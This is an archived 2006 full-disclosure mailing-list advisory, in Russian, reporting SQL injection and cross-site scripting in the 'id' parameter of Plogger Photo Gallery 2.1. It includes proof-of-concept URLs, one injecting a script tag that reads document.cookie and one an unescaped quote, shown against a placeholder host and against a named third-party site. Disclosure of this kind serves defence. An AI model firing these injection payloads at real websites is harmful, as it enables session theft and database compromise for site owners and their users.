Related information

Web applications security vulnerabilities (PHP, ASP, JSP, CGI, Perl)

[SA18342] MegaBBS "replyid" Disclosure of Private Messages

[SA18360] phpChamber "needle" Cross-Site Scripting Vulnerability

[SA18361] Joomla! vCard Email Address Disclosure and TinyMCE Compressor Vulnerabilities

[Full-disclosure] Secunia Research: ADOdb Insecure Test Scripts Security Issues

From:	durito <durito_(at)_mail.ru>
Date:	10.01.2006
Subject:	Sql-инъекция и межсайтовый скриптинг в Plogger Photo Gallery

Здравствуйте, 3APA3A.

свежая порция:
 Software:  Plogger Photo Gallery > = 2.1
 Vendor:  Plogger www.plogger.org
 Vulnerability: Sql-инъекция и межсайтовый скриптинг
 Risk:  средний
 Date:  10.01.2006
 discovered by durito -durito[at]mail[dot]ru-
 HTTP:         all-about-all.net
               durito.narod.ru

 +~~~:| Details |:
 
 Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" . Удаленный пользователь может с помощью специально сформированного запроса выполнить Sql-инъекция и произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
 Межсайтовый скриптинг:
 http://www.xxx.com/gallery/index.php?level=album&id=%3Cscript%3Ealer
t(document.cookie);%3C/script%3E

 Sql-инъекция:
 http://www.xxx.com/gallery/index.php?level=album&id='1
 
 Примеры:

http://www.mahyuni.com/gallery/index.php?level=album&id='1
http://www.mahyuni.com/gallery/index.php?level=album&id=%3Cscript%3Ea
lert(document.cookie);%3C/script%3E

   
 

--
С уважением,
durito [LwB Security Team]                 mailto:durito@mail.ru
http://durito.narod.ru